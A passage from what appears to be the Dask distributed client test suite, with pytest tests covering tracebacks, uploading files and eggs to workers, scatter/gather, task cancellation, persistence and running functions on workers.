exc_type, exc_value, exc_traceback = sys.exc_info()
L = traceback.format_tb(exc_traceback)
assert any("x / y" in line for line in L)
@gen_cluster(client=True)
async def test_gather_traceback(c, s, a, b):
x = c.submit(div, 1, 0)
try:
await c.gather(x)
except ZeroDivisionError:
exc_type, exc_value, exc_traceback = sys.exc_info()
L = traceback.format_tb(exc_traceback)
assert any("x / y" in line for line in L)
def test_traceback_sync(c):
x = c.submit(div, 1, 0)
tb = x.traceback()
assert any(
"x / y" in line
for line in concat(traceback.extract_tb(tb))
if isinstance(line, str)
)
y = c.submit(inc, x)
tb2 = y.traceback()
assert set(pluck(3, traceback.extract_tb(tb2))).issuperset(
set(pluck(3, traceback.extract_tb(tb)))
)
z = c.submit(div, 1, 2)
tb = z.traceback()
assert tb is None
@gen_cluster(client=True)
async def test_upload_file(c, s, a, b):
def g():
import myfile
return myfile.f()
with save_sys_modules():
for value in [123, 456]:
with tmp_text("myfile.py", f"def f():\n return {value}") as fn:
await c.upload_file(fn)
x = c.submit(g, pure=False)
result = await x
assert result == value
@gen_cluster(client=True)
async def test_upload_file_refresh_delayed(c, s, a, b):
with save_sys_modules():
for value in [123, 456]:
with tmp_text("myfile.py", f"def f():\n return {value}") as fn:
await c.upload_file(fn)
sys.path.append(os.path.dirname(fn))
from myfile import f
b = delayed(f)()
bb = c.compute(b, sync=False)
result = await c.gather(bb)
assert result == value
@gen_cluster(client=True)
async def test_upload_file_no_extension(c, s, a, b):
with tmp_text("myfile", "") as fn:
await c.upload_file(fn)
@gen_cluster(client=True)
async def test_upload_file_zip(c, s, a, b):
def g():
import myfile
return myfile.f()
with save_sys_modules():
try:
for value in [123, 456]:
with tmp_text(
"myfile.py", f"def f():\n return {value}"
) as fn_my_file:
with zipfile.ZipFile("myfile.zip", "w") as z:
z.write(fn_my_file, arcname=os.path.basename(fn_my_file))
await c.upload_file("myfile.zip")
x = c.submit(g, pure=False)
result = await x
assert result == value
finally:
if os.path.exists("myfile.zip"):
os.remove("myfile.zip")
@gen_cluster(client=True)
async def test_upload_file_egg(c, s, a, b):
def g():
import package_1
import package_2
return package_1.a, package_2.b
# c.upload_file tells each worker to
# - put this file in their local_directory
# - modify their sys.path to include it
# we don't care about the local_directory
# but we do care about restoring the path
with save_sys_modules():
for value in [123, 456]:
with tmpfile() as dirname:
os.mkdir(dirname)
with open(os.path.join(dirname, "setup.py"), "w") as f:
f.write("from setuptools import setup, find_packages\n")
f.write(
'setup(name="my_package", packages=find_packages(), version="{}")\n'.format(
value
)
)
# test a package with an underscore in the name
package_1 = os.path.join(dirname, "package_1")
os.mkdir(package_1)
with open(os.path.join(package_1, "__init__.py"), "w") as f:
f.write(f"a = {value}\n")
# test multiple top-level packages
package_2 = os.path.join(dirname, "package_2")
os.mkdir(package_2)
with open(os.path.join(package_2, "__init__.py"), "w") as f:
f.write(f"b = {value}\n")
# compile these into an egg
subprocess.check_call(
[sys.executable, "setup.py", "bdist_egg"], cwd=dirname
)
egg_root = os.path.join(dirname, "dist")
# first file ending with '.egg'
egg_name = [
fname for fname in os.listdir(egg_root) if fname.endswith(".egg")
][0]
egg_path = os.path.join(egg_root, egg_name)
await c.upload_file(egg_path)
os.remove(egg_path)
x = c.submit(g, pure=False)
result = await x
assert result == (value, value)
@gen_cluster(client=True)
async def test_upload_large_file(c, s, a, b):
assert a.local_directory
assert b.local_directory
with tmp_text("myfile", "abc") as fn:
with tmp_text("myfile2", "def") as fn2:
await c._upload_large_file(fn, remote_filename="x")
await c._upload_large_file(fn2)
for w in [a, b]:
assert os.path.exists(os.path.join(w.local_directory, "x"))
assert os.path.exists(os.path.join(w.local_directory, "myfile2"))
with open(os.path.join(w.local_directory, "x")) as f:
assert f.read() == "abc"
with open(os.path.join(w.local_directory, "myfile2")) as f:
assert f.read() == "def"
def test_upload_file_sync(c):
def g():
import myfile
return myfile.x
with tmp_text("myfile.py", "x = 123") as fn:
c.upload_file(fn)
x = c.submit(g)
assert x.result() == 123
@gen_cluster(client=True)
async def test_upload_file_exception(c, s, a, b):
with tmp_text("myfile.py", "syntax-error!") as fn:
with pytest.raises(SyntaxError):
await c.upload_file(fn)
def test_upload_file_exception_sync(c):
with tmp_text("myfile.py", "syntax-error!") as fn:
with pytest.raises(SyntaxError):
c.upload_file(fn)
@gen_cluster(client=True, nthreads=[])
async def test_upload_file_new_worker(c, s):
def g():
import myfile
return myfile.x
with tmp_text("myfile.py", "x = 123") as fn:
await c.upload_file(fn)
async with Worker(s.address):
x = await c.submit(g)
assert x == 123
@pytest.mark.skip
@gen_cluster()
async def test_multiple_clients(s, a, b):
a = await Client(s.address, asynchronous=True)
b = await Client(s.address, asynchronous=True)
x = a.submit(inc, 1)
y = b.submit(inc, 2)
assert x.client is a
assert y.client is b
xx = await x
yy = await y
assert xx == 2
assert yy == 3
z = a.submit(add, x, y)
assert z.client is a
zz = await z
assert zz == 5
await a.close()
await b.close()
@gen_cluster(client=True)
async def test_async_compute(c, s, a, b):
from dask.delayed import delayed
x = delayed(1)
y = delayed(inc)(x)
z = delayed(dec)(x)
[yy, zz, aa] = c.compute([y, z, 3], sync=False)
assert isinstance(yy, Future)
assert isinstance(zz, Future)
assert aa == 3
result = await c.gather([yy, zz])
assert result == [2, 0]
assert isinstance(c.compute(y), Future)
assert isinstance(c.compute([y]), (tuple, list))
@gen_cluster(client=True)
async def test_async_compute_with_scatter(c, s, a, b):
d = await c.scatter({("x", 1): 1, ("y", 1): 2})
x, y = d[("x", 1)], d[("y", 1)]
from dask.delayed import delayed
z = delayed(add)(delayed(inc)(x), delayed(inc)(y))
zz = c.compute(z)
[result] = await c.gather([zz])
assert result == 2 + 3
def test_sync_compute(c):
x = delayed(1)
y = delayed(inc)(x)
z = delayed(dec)(x)
yy, zz = c.compute([y, z], sync=True)
assert (yy, zz) == (2, 0)
@gen_cluster(client=True)
async def test_remote_scatter_gather(c, s, a, b):
x, y, z = await c.scatter([1, 2, 3])
assert x.key in a.data or x.key in b.data
assert y.key in a.data or y.key in b.data
assert z.key in a.data or z.key in b.data
xx, yy, zz = await c.gather([x, y, z])
assert (xx, yy, zz) == (1, 2, 3)
@gen_cluster(client=True)
async def test_remote_submit_on_Future(c, s, a, b):
x = c.submit(lambda x: x + 1, 1)
y = c.submit(lambda x: x + 1, x)
result = await y
assert result == 3
def test_start_is_idempotent(c):
c.start()
c.start()
c.start()
x = c.submit(inc, 1)
assert x.result() == 2
@gen_cluster(client=True)
async def test_client_with_scheduler(c, s, a, b):
assert s.nthreads == {a.address: a.nthreads, b.address: b.nthreads}
x = c.submit(inc, 1)
y = c.submit(inc, 2)
z = c.submit(add, x, y)
result = await x
assert result == 1 + 1
result = await z
assert result == 1 + 1 + 1 + 2
A, B, C = await c.scatter([1, 2, 3])
AA, BB, xx = await c.gather([A, B, x])
assert (AA, BB, xx) == (1, 2, 2)
result = await c.get({"x": (inc, 1), "y": (add, "x", 10)}, "y", sync=False)
assert result == 12
@pytest.mark.skipif(not LINUX, reason="Need 127.0.0.2 to mean localhost")
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
async def test_allow_restrictions(c, s, a, b):
aws = s.workers[a.address]
bws = s.workers[a.address]
x = c.submit(inc, 1, workers=a.ip)
await x
assert s.tasks[x.key].who_has == {aws}
assert not s.loose_restrictions
x = c.submit(inc, 2, workers=a.ip, allow_other_workers=True)
await x
assert s.tasks[x.key].who_has == {aws}
assert x.key in s.loose_restrictions
L = c.map(inc, range(3, 13), workers=a.ip, allow_other_workers=True)
await wait(L)
assert all(s.tasks[f.key].who_has == {aws} for f in L)
assert {f.key for f in L}.issubset(s.loose_restrictions)
x = c.submit(inc, 15, workers="127.0.0.3", allow_other_workers=True)
await x
assert s.tasks[x.key].who_has
assert x.key in s.loose_restrictions
L = c.map(inc, range(15, 25), workers="127.0.0.3", allow_other_workers=True)
await wait(L)
assert all(s.tasks[f.key].who_has for f in L)
assert {f.key for f in L}.issubset(s.loose_restrictions)
with pytest.raises(ValueError):
c.submit(inc, 1, allow_other_workers=True)
with pytest.raises(ValueError):
c.map(inc, [1], allow_other_workers=True)
with pytest.raises(TypeError):
c.submit(inc, 20, workers="127.0.0.1", allow_other_workers="Hello!")
with pytest.raises(TypeError):
c.map(inc, [20], workers="127.0.0.1", allow_other_workers="Hello!")
def test_bad_address():
with pytest.raises(OSError, match="connect"):
Client("123.123.123.123:1234", timeout=0.1)
with pytest.raises(OSError, match="connect"):
Client("127.0.0.1:1234", timeout=0.1)
def test_informative_error_on_cluster_type():
with pytest.raises(TypeError) as exc_info:
Client(LocalCluster)
assert "Scheduler address must be a string or a Cluster instance" in str(
exc_info.value
)
@gen_cluster(client=True)
async def test_long_error(c, s, a, b):
def bad(x):
raise ValueError("a" * 100000)
x = c.submit(bad, 10)
try:
await x
except ValueError as e:
assert len(str(e)) < 100000
tb = await x.traceback()
assert all(
len(line) < 100000
for line in concat(traceback.extract_tb(tb))
if isinstance(line, str)
)
@gen_cluster(client=True)
async def test_map_on_futures_with_kwargs(c, s, a, b):
def f(x, y=10):
return x + y
futures = c.map(inc, range(10))
futures2 = c.map(f, futures, y=20)
results = await c.gather(futures2)
assert results == [i + 1 + 20 for i in range(10)]
future = c.submit(inc, 100)
future2 = c.submit(f, future, y=200)
result = await future2
assert result == 100 + 1 + 200
class BadlySerializedObject:
def __getstate__(self):
return 1
def __setstate__(self, state):
raise TypeError("hello!")
class FatallySerializedObject:
def __getstate__(self):
return 1
def __setstate__(self, state):
print("This should never have been deserialized, closing")
import sys
sys.exit(0)
@gen_cluster(client=True)
async def test_badly_serialized_input(c, s, a, b):
o = BadlySerializedObject()
future = c.submit(inc, o)
futures = c.map(inc, range(10))
L = await c.gather(futures)
assert list(L) == list(map(inc, range(10)))
assert future.status == "error"
with pytest.raises(Exception) as info:
await future
assert "hello!" in str(info.value)
@pytest.mark.skip
@gen_test()
async def test_badly_serialized_input_stderr(capsys, c):
o = BadlySerializedObject()
future = c.submit(inc, o)
while True:
sleep(0.01)
out, err = capsys.readouterr()
if "hello!" in err:
break
assert future.status == "error"
def test_repr(loop):
funcs = [str, repr, lambda x: x._repr_html_()]
with cluster(nworkers=3, worker_kwargs={"memory_limit": "2 GiB"}) as (s, [a, b, c]):
with Client(s["address"], loop=loop) as c:
for func in funcs:
text = func(c)
assert c.scheduler.address in text
assert "threads=3" in text or "Total threads: </strong>" in text
assert "6.00 GiB" in text
if "<table" not in text:
assert len(text) < 80
for func in funcs:
text = func(c)
assert "No scheduler connected" in text
@gen_cluster(client=True)
async def test_repr_async(c, s, a, b):
c._repr_html_()
@gen_cluster(client=True, worker_kwargs={"memory_limit": None})
async def test_repr_no_memory_limit(c, s, a, b):
c._repr_html_()
@gen_test()
async def test_repr_localcluster():
cluster = await LocalCluster(
processes=False, dashboard_address=":0", asynchronous=True
)
client = await Client(cluster, asynchronous=True)
try:
text = client._repr_html_()
assert cluster.scheduler.address in text
assert is_valid_xml(client._repr_html_())
finally:
await client.close()
await cluster.close()
@gen_cluster(client=True)
async def test_forget_simple(c, s, a, b):
x = c.submit(inc, 1, retries=2)
y = c.submit(inc, 2)
z = c.submit(add, x, y, workers=[a.ip], allow_other_workers=True)
await wait([x, y, z])
assert not s.waiting_data.get(x.key)
assert not s.waiting_data.get(y.key)
assert set(s.tasks) == {x.key, y.key, z.key}
s.client_releases_keys(keys=[x.key], client=c.id)
assert x.key in s.tasks
s.client_releases_keys(keys=[z.key], client=c.id)
assert x.key not in s.tasks
assert z.key not in s.tasks
assert not s.tasks[y.key].dependents
s.client_releases_keys(keys=[y.key], client=c.id)
assert not s.tasks
@gen_cluster(client=True)
async def test_forget_complex(e, s, A, B):
a, b, c, d = await e.scatter(list(range(4)))
ab = e.submit(add, a, b)
cd = e.submit(add, c, d)
ac = e.submit(add, a, c)
acab = e.submit(add, ac, ab)
await wait([a, b, c, d, ab, ac, cd, acab])
assert set(s.tasks) == {f.key for f in [ab, ac, cd, acab, a, b, c, d]}
s.client_releases_keys(keys=[ab.key], client=e.id)
assert set(s.tasks) == {f.key for f in [ab, ac, cd, acab, a, b, c, d]}
s.client_releases_keys(keys=[b.key], client=e.id)
assert set(s.tasks) == {f.key for f in [ac, cd, acab, a, c, d]}
s.client_releases_keys(keys=[acab.key], client=e.id)
assert set(s.tasks) == {f.key for f in [ac, cd, a, c, d]}
assert b.key not in s.tasks
while b.key in A.data or b.key in B.data:
await asyncio.sleep(0.01)
s.client_releases_keys(keys=[ac.key], client=e.id)
assert set(s.tasks) == {f.key for f in [cd, a, c, d]}
@gen_cluster(client=True)
async def test_forget_in_flight(e, s, A, B):
delayed2 = partial(delayed, pure=True)
a, b, c, d = (delayed2(slowinc)(i) for i in range(4))
ab = delayed2(slowadd)(a, b, dask_key_name="ab")
cd = delayed2(slowadd)(c, d, dask_key_name="cd")
ac = delayed2(slowadd)(a, c, dask_key_name="ac")
acab = delayed2(slowadd)(ac, ab, dask_key_name="acab")
x, y = e.compute([ac, acab])
s.validate_state()
for i in range(5):
await asyncio.sleep(0.01)
s.validate_state()
s.client_releases_keys(keys=[y.key], client=e.id)
s.validate_state()
for k in [acab.key, ab.key, b.key]:
assert k not in s.tasks
@gen_cluster(client=True)
async def test_forget_errors(c, s, a, b):
x = c.submit(div, 1, 0)
y = c.submit(inc, x)
z = c.submit(inc, y)
await wait([y])
assert x.key in s.exceptions
assert x.key in s.exceptions_blame
assert y.key in s.exceptions_blame
assert z.key in s.exceptions_blame
s.client_releases_keys(keys=[z.key], client=c.id)
assert x.key in s.exceptions
assert x.key in s.exceptions_blame
assert y.key in s.exceptions_blame
assert z.key not in s.exceptions_blame
s.client_releases_keys(keys=[x.key], client=c.id)
assert x.key in s.exceptions
assert x.key in s.exceptions_blame
assert y.key in s.exceptions_blame
assert z.key not in s.exceptions_blame
s.client_releases_keys(keys=[y.key], client=c.id)
assert x.key not in s.exceptions
assert x.key not in s.exceptions_blame
assert y.key not in s.exceptions_blame
assert z.key not in s.exceptions_blame
def test_repr_sync(c):
s = str(c)
r = repr(c)
assert c.scheduler.address in s
assert c.scheduler.address in r
assert str(2) in s # nworkers
assert "cores" in s or "threads" in s
@gen_cluster(client=True)
async def test_waiting_data(c, s, a, b):
x = c.submit(inc, 1)
y = c.submit(inc, 2)
z = c.submit(add, x, y, workers=[a.ip], allow_other_workers=True)
await wait([x, y, z])
assert not s.waiting_data.get(x.key)
assert not s.waiting_data.get(y.key)
@gen_cluster()
async def test_multi_client(s, a, b):
c = await Client(s.address, asynchronous=True)
f = await Client(s.address, asynchronous=True)
assert set(s.client_comms) == {c.id, f.id}
x = c.submit(inc, 1)
y = f.submit(inc, 2)
y2 = c.submit(inc, 2)
assert y.key == y2.key
await wait([x, y])
assert s.wants_what == {
c.id: {x.key, y.key},
f.id: {y.key},
"fire-and-forget": set(),
}
assert s.who_wants == {x.key: {c.id}, y.key: {c.id, f.id}}
await c.close()
while c.id in s.wants_what:
await asyncio.sleep(0.01)
assert c.id not in s.wants_what
assert c.id not in s.who_wants[y.key]
assert x.key not in s.who_wants
await f.close()
while s.tasks:
await asyncio.sleep(0.01)
def long_running_client_connection(address):
with pristine_loop():
c = Client(address)
x = c.submit(lambda x: x + 1, 10)
x.result()
sleep(100)
@gen_cluster()
async def test_cleanup_after_broken_client_connection(s, a, b):
proc = mp_context.Process(target=long_running_client_connection, args=(s.address,))
proc.daemon = True
proc.start()
while not s.tasks:
await asyncio.sleep(0.01)
proc.terminate()
while s.tasks:
await asyncio.sleep(0.01)
@gen_cluster()
async def test_multi_garbage_collection(s, a, b):
c = await Client(s.address, asynchronous=True)
f = await Client(s.address, asynchronous=True)
x = c.submit(inc, 1)
y = f.submit(inc, 2)
y2 = c.submit(inc, 2)
assert y.key == y2.key
await wait([x, y])
x.__del__()
while x.key in a.data or x.key in b.data:
await asyncio.sleep(0.01)
assert s.wants_what == {c.id: {y.key}, f.id: {y.key}, "fire-and-forget": set()}
assert s.who_wants == {y.key: {c.id, f.id}}
y.__del__()
while x.key in s.wants_what[f.id]:
await asyncio.sleep(0.01)
await asyncio.sleep(0.1)
assert y.key in a.data or y.key in b.data
assert s.wants_what == {c.id: {y.key}, f.id: set(), "fire-and-forget": set()}
assert s.who_wants == {y.key: {c.id}}
y2.__del__()
while y.key in a.data or y.key in b.data:
await asyncio.sleep(0.01)
assert not any(v for v in s.wants_what.values())
assert not s.who_wants
await c.close()
await f.close()
@gen_cluster(client=True)
async def test__broadcast(c, s, a, b):
x, y = await c.scatter([1, 2], broadcast=True)
assert a.data == b.data == {x.key: 1, y.key: 2}
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 4)
async def test__broadcast_integer(c, s, *workers):
x, y = await c.scatter([1, 2], broadcast=2)
assert len(s.tasks[x.key].who_has) == 2
assert len(s.tasks[y.key].who_has) == 2
@gen_cluster(client=True)
async def test__broadcast_dict(c, s, a, b):
d = await c.scatter({"x": 1}, broadcast=True)
assert a.data == b.data == {"x": 1}
def test_broadcast(c, s, a, b):
x, y = c.scatter([1, 2], broadcast=True)
has_what = sync(c.loop, c.scheduler.has_what)
assert {k: set(v) for k, v in has_what.items()} == {
a["address"]: {x.key, y.key},
b["address"]: {x.key, y.key},
}
[z] = c.scatter([3], broadcast=True, workers=[a["address"]])
has_what = sync(c.loop, c.scheduler.has_what)
assert {k: set(v) for k, v in has_what.items()} == {
a["address"]: {x.key, y.key, z.key},
b["address"]: {x.key, y.key},
}
@gen_cluster(client=True)
async def test_proxy(c, s, a, b):
msg = await c.scheduler.proxy(msg={"op": "identity"}, worker=a.address)
assert msg["id"] == a.identity()["id"]
@gen_cluster(client=True)
async def test_cancel(c, s, a, b):
x = c.submit(slowinc, 1)
y = c.submit(slowinc, x)
while y.key not in s.tasks:
await asyncio.sleep(0.01)
await c.cancel([x])
assert x.cancelled()
assert "cancel" in str(x)
s.validate_state()
while not y.cancelled():
await asyncio.sleep(0.01)
assert not s.tasks
s.validate_state()
@gen_cluster(client=True)
async def test_cancel_tuple_key(c, s, a, b):
x = c.submit(inc, 1, key=("x", 0, 1))
await x
await c.cancel(x)
with pytest.raises(CancelledError):
await x
@gen_cluster()
async def test_cancel_multi_client(s, a, b):
c = await Client(s.address, asynchronous=True)
f = await Client(s.address, asynchronous=True)
x = c.submit(slowinc, 1)
y = f.submit(slowinc, 1)
assert x.key == y.key
await c.cancel([x])
assert x.cancelled()
assert not y.cancelled()
while y.key not in s.tasks:
await asyncio.sleep(0.01)
out = await y
assert out == 2
with pytest.raises(CancelledError):
await x
await c.close()
await f.close()
@gen_cluster(client=True)
async def test_cancel_collection(c, s, a, b):
L = c.map(double, [[1], [2], [3]])
x = db.Bag({("b", i): f for i, f in enumerate(L)}, "b", 3)
await c.cancel(x)
await c.cancel([x])
assert all(f.cancelled() for f in L)
while s.tasks:
await asyncio.sleep(0.01)
def test_cancel_sync(c):
x = c.submit(slowinc, 1, key="x")
y = c.submit(slowinc, x, key="y")
z = c.submit(slowinc, y, key="z")
c.cancel([y])
start = time()
while not z.cancelled():
sleep(0.01)
assert time() < start + 30
assert x.result() == 2
z.cancel()
assert z.cancelled()
@gen_cluster(client=True)
async def test_future_type(c, s, a, b):
x = c.submit(inc, 1)
await wait([x])
assert x.type == int
assert "int" in str(x)
@gen_cluster(client=True)
async def test_traceback_clean(c, s, a, b):
x = c.submit(div, 1, 0)
try:
await x
except Exception as e:
f = e
exc_type, exc_value, tb = sys.exc_info()
while tb:
assert "scheduler" not in tb.tb_frame.f_code.co_filename
assert "worker" not in tb.tb_frame.f_code.co_filename
tb = tb.tb_next
@gen_cluster(client=True)
async def test_map_differnet_lengths(c, s, a, b):
assert len(c.map(add, [1, 2], [1, 2, 3])) == 2
def test_Future_exception_sync_2(loop, capsys):
with cluster() as (s, [a, b]):
with Client(s["address"], loop=loop) as c:
assert dask.base.get_scheduler() == c.get
out, err = capsys.readouterr()
assert len(out.strip().split("\n")) == 1
assert dask.base.get_scheduler() != c.get
@gen_cluster(timeout=60, client=True)
async def test_async_persist(c, s, a, b):
from dask.delayed import Delayed, delayed
x = delayed(1)
y = delayed(inc)(x)
z = delayed(dec)(x)
w = delayed(add)(y, z)
yy, ww = c.persist([y, w])
assert type(yy) == type(y)
assert type(ww) == type(w)
assert len(yy.dask) == 1
assert len(ww.dask) == 1
assert len(w.dask) > 1
assert y.__dask_keys__() == yy.__dask_keys__()
assert w.__dask_keys__() == ww.__dask_keys__()
while y.key not in s.tasks and w.key not in s.tasks:
await asyncio.sleep(0.01)
assert s.who_wants[y.key] == {c.id}
assert s.who_wants[w.key] == {c.id}
yyf, wwf = c.compute([yy, ww])
yyy, www = await c.gather([yyf, wwf])
assert yyy == inc(1)
assert www == add(inc(1), dec(1))
assert isinstance(c.persist(y), Delayed)
assert isinstance(c.persist([y]), (list, tuple))
@gen_cluster(client=True)
async def test__persist(c, s, a, b):
pytest.importorskip("dask.array")
import dask.array as da
x = da.ones((10, 10), chunks=(5, 10))
y = 2 * (x + 1)
assert len(y.dask) == 6
yy = c.persist(y)
assert len(y.dask) == 6
assert len(yy.dask) == 2
assert all(isinstance(v, Future) for v in yy.dask.values())
assert yy.__dask_keys__() == y.__dask_keys__()
g, h = c.compute([y, yy])
gg, hh = await c.gather([g, h])
assert (gg == hh).all()
def test_persist(c):
pytest.importorskip("dask.array")
import dask.array as da
x = da.ones((10, 10), chunks=(5, 10))
y = 2 * (x + 1)
assert len(y.dask) == 6
yy = c.persist(y)
assert len(y.dask) == 6
assert len(yy.dask) == 2
assert all(isinstance(v, Future) for v in yy.dask.values())
assert yy.__dask_keys__() == y.__dask_keys__()
zz = yy.compute()
z = y.compute()
assert (zz == z).all()
@gen_cluster(timeout=60, client=True)
async def test_long_traceback(c, s, a, b):
from distributed.protocol.pickle import dumps
def deep(n):
if n == 0:
1 / 0
else:
return deep(n - 1)
x = c.submit(deep, 200)
await wait([x])
assert len(dumps(c.futures[x.key].traceback)) < 10000
assert isinstance(c.futures[x.key].exception, ZeroDivisionError)
@gen_cluster(client=True)
async def test_wait_on_collections(c, s, a, b):
L = c.map(double, [[1], [2], [3]])
x = db.Bag({("b", i): f for i, f in enumerate(L)}, "b", 3)
await wait(x)
assert all(f.key in a.data or f.key in b.data for f in L)
@gen_cluster(client=True)
async def test_futures_of_get(c, s, a, b):
x, y, z = c.map(inc, [1, 2, 3])
assert set(futures_of(0)) == set()
assert set(futures_of(x)) == {x}
assert set(futures_of([x, y, z])) == {x, y, z}
assert set(futures_of([x, [y], [[z]]])) == {x, y, z}
assert set(futures_of({"x": x, "y": [y]})) == {x, y}
b = db.Bag({("b", i): f for i, f in enumerate([x, y, z])}, "b", 3)
assert set(futures_of(b)) == {x, y, z}
sg = SubgraphCallable(
{"x": x, "y": y, "z": z, "out": (add, (add, (add, x, y), z), "in")},
"out",
("in",),
)
assert set(futures_of(sg)) == {x, y, z}
def test_futures_of_class():
da = pytest.importorskip("dask.array")
assert futures_of([da.Array]) == []
@gen_cluster(client=True)
async def test_futures_of_cancelled_raises(c, s, a, b):
x = c.submit(inc, 1)
await c.cancel([x])
with pytest.raises(CancelledError):
await x
with pytest.raises(CancelledError):
await c.get({"x": (inc, x), "y": (inc, 2)}, ["x", "y"], sync=False)
with pytest.raises(CancelledError):
c.submit(inc, x)
with pytest.raises(CancelledError):
c.submit(add, 1, y=x)
with pytest.raises(CancelledError):
c.map(add, [1], y=x)
assert "y" not in s.tasks
@pytest.mark.skip
@gen_cluster(nthreads=[("127.0.0.1", 1)], client=True)
async def test_dont_delete_recomputed_results(c, s, w):
x = c.submit(inc, 1) # compute first time
await wait([x])
x.__del__() # trigger garbage collection
await asyncio.sleep(0)
xx = c.submit(inc, 1) # compute second time
start = time()
while xx.key not in w.data: # data shows up
await asyncio.sleep(0.01)
assert time() < start + 1
while time() < start + (s.delete_interval + 100) / 1000: # and stays
assert xx.key in w.data
await asyncio.sleep(0.01)
@gen_cluster(nthreads=[], client=True)
async def test_fatally_serialized_input(c, s):
o = FatallySerializedObject()
future = c.submit(inc, o)
while not s.tasks:
await asyncio.sleep(0.01)
@pytest.mark.skip(reason="Use fast random selection now")
@gen_cluster(client=True)
async def test_balance_tasks_by_stacks(c, s, a, b):
x = c.submit(inc, 1)
await wait(x)
y = c.submit(inc, 2)
await wait(y)
assert len(a.data) == len(b.data) == 1
@gen_cluster(client=True)
async def test_run(c, s, a, b):
results = await c.run(inc, 1)
assert results == {a.address: 2, b.address: 2}
results = await c.run(inc, 1, workers=[a.address])
assert results == {a.address: 2}
results = await c.run(inc, 1, workers=[])
assert results == {}
@gen_cluster(client=True)
async def test_run_handles_picklable_data(c, s, a, b):
futures = c.map(inc, range(10))
await wait(futures)
def func():
return {}, set(), [], (), 1, "hello", b"100"
results = await c.run_on_scheduler(func)
assert results == func()
results = await c.run(func)
assert results == {w.address: func() for w in [a, b]}
def test_run_sync(c, s, a, b):
def func(x, y=10):
return x + y
result = c.run(func, 1, y=2)
assert result == {a["address"]: 3, b["address"]: 3}
result = c.run(func, 1, y=2, workers=[a["address"]])
assert result == {a["address"]: 3}
@gen_cluster(client=True)
async def test_run_coroutine(c, s, a, b):
results = await c.run(geninc, 1, delay=0.05)
assert results == {a.address: 2, b.address: 2}
results = await c.run(geninc, 1, delay=0.05, workers=[a.address])
assert results == {a.address: 2}
results = await c.run(geninc, 1, workers=[])
assert results == {}
with pytest.raises(RuntimeError, match="hello"):
await c.run(throws, 1)
results = await c.run(asyncinc, 2, delay=0.01)
assert results == {a.address: 3, b.address: 3}
def test_run_coroutine_sync(c, s, a, b):
result = c.run(geninc, 2, delay=0.01)
assert result == {a["address"]: 3, b["address"]: 3}
result = c.run(geninc, 2, workers=[a["address"]])
assert result == {a["address"]: 3}
t1 = time()
result = c.run(geninc, 2, delay=10, wait=False)
t2 = time()
assert result is None
assert t2 - t1 <= 1.0
@gen_cluster(client=True)
async def test_run_coroutine_deprecated(c, s, a, b):
async def foo():
return "bar"
with pytest.warns(FutureWarning, match="Client.run "):
results = await c.run_coroutine(foo)
assert results == {a.address: "bar", b.address: "bar"}
@gen_cluster(client=True)
async def test_run_exception(c, s, a, b):
class MyError(Exception):
pass
def raise_exception(dask_worker, addr):
if addr == dask_worker.address:
raise MyError("informative message")
return 123
with pytest.raises(MyError, match="informative message"):
await c.run(raise_exception, addr=a.address)
with pytest.raises(MyError, match="informative message"):
await c.run(raise_exception, addr=a.address, on_error="raise")
with pytest.raises(ValueError, match="on_error must be"):
await c.run(raise_exception, addr=a.address, on_error="invalid")
out = await c.run(raise_exception, addr=a.address, on_error="return")
assert isinstance(out[a.address], MyError)
assert out[b.address] == 123
out = await c.run(raise_exception, addr=a.address, on_error="ignore")
assert out == {b.address: 123}
@gen_cluster(client=True, config={"distributed.comm.timeouts.connect": "200ms"})
async def test_run_rpc_error(c, s, a, b):
a.stop()
with pytest.raises(OSError, match="Timed out trying to connect"):
await c.run(inc, 1)
with pytest.raises(OSError, match="Timed out trying to connect"):
await c.run(inc, 1, on_error="raise")
out = await c.run(inc, 1, on_error="return")
assert isinstance(out[a.address], OSError)
assert out[b.address] == 2
out = await c.run(inc, 1, on_error="ignore")
assert out == {b.address: 2}
def test_diagnostic_ui(loop):
with cluster() as (s, [a, b]):
a_addr = a["address"]
b_addr = b["address"]
with Client(s["address"], loop=loop) as c:
d = c.nthreads()
assert d == {a_addr: 1, b_addr: 1}
d = c.nthreads([a_addr])
assert d == {a_addr: 1}
d = c.nthreads(a_addr)
assert d == {a_addr: 1}
d = c.nthreads(a["address"])
assert d == {a_addr: 1}
x = c.submit(inc, 1)
y = c.submit(inc, 2)
z = c.submit(inc, 3)
wait([x, y, z])
d = c.who_has()
assert set(d) == {x.key, y.key, z.key}
assert all(w in [a_addr, b_addr] for v in d.values() for w in v)
assert all(d.values())
d = c.who_has([x, y])
assert set(d) == {x.key, y.key}
d = c.who_has(x)
assert set(d) == {x.key}
d = c.has_what()
assert set(d) == {a_addr, b_addr}
assert all(k in [x.key, y.key, z.key] for v in d.values() for k in v)
d = c.has_what([a_addr])
assert set(d) == {a_addr}
d = c.has_what(a_addr)
assert set(d) == {a_addr}
def test_diagnostic_nbytes_sync(c):
incs = c.map(inc, [1, 2, 3])
doubles = c.map(double, [1, 2, 3])
wait(incs + doubles)
assert c.nbytes(summary=False) == {k.key: sizeof(1) for k in incs + doubles}
assert c.nbytes(summary=True) == {"inc": sizeof(1) * 3, "double": sizeof(1) * 3}
@gen_cluster(client=True)
async def test_diagnostic_nbytes(c, s, a, b):
incs = c.map(inc, [1, 2, 3])
doubles = c.map(double, [1, 2, 3])
await wait(incs + doubles)
assert s.get_nbytes(summary=False) == {k.key: sizeof(1) for k in incs + doubles}
assert s.get_nbytes(summary=True) == {"inc": sizeof(1) * 3, "double": sizeof(1) * 3}
@gen_cluster(client=True, nthreads=[])
async def test_worker_aliases(c, s):
a = Worker(s.address, name="alice")
b = Worker(s.address, name="bob")
w = Worker(s.address, name=3)
await asyncio.gather(a, b, w)
L = c.map(inc, range(10), workers="alice")
future = await c.scatter(123, workers=3)
await wait(L)
assert len(a.data) == 10
assert len(b.data) == 0
assert dict(w.data) == {future.key: 123}
for i, alias in enumerate([3, [3], "alice"]):
result = await c.submit(lambda x: x + 1, i, workers=alias)
assert result == i + 1
await asyncio.gather(a.close(), b.close(), w.close())
def test_persist_get_sync(c):
x, y = delayed(1), delayed(2)
xx = delayed(add)(x, x)
yy = delayed(add)(y, y)
xxyy = delayed(add)(xx, yy)
xxyy2 = c.persist(xxyy)
xxyy3 = delayed(add)(xxyy2, 10)
assert xxyy3.compute() == ((1 + 1) + (2 + 2)) + 10
@gen_cluster(client=True)
async def test_persist_get(c, s, a, b):
x, y = delayed(1), delayed(2)
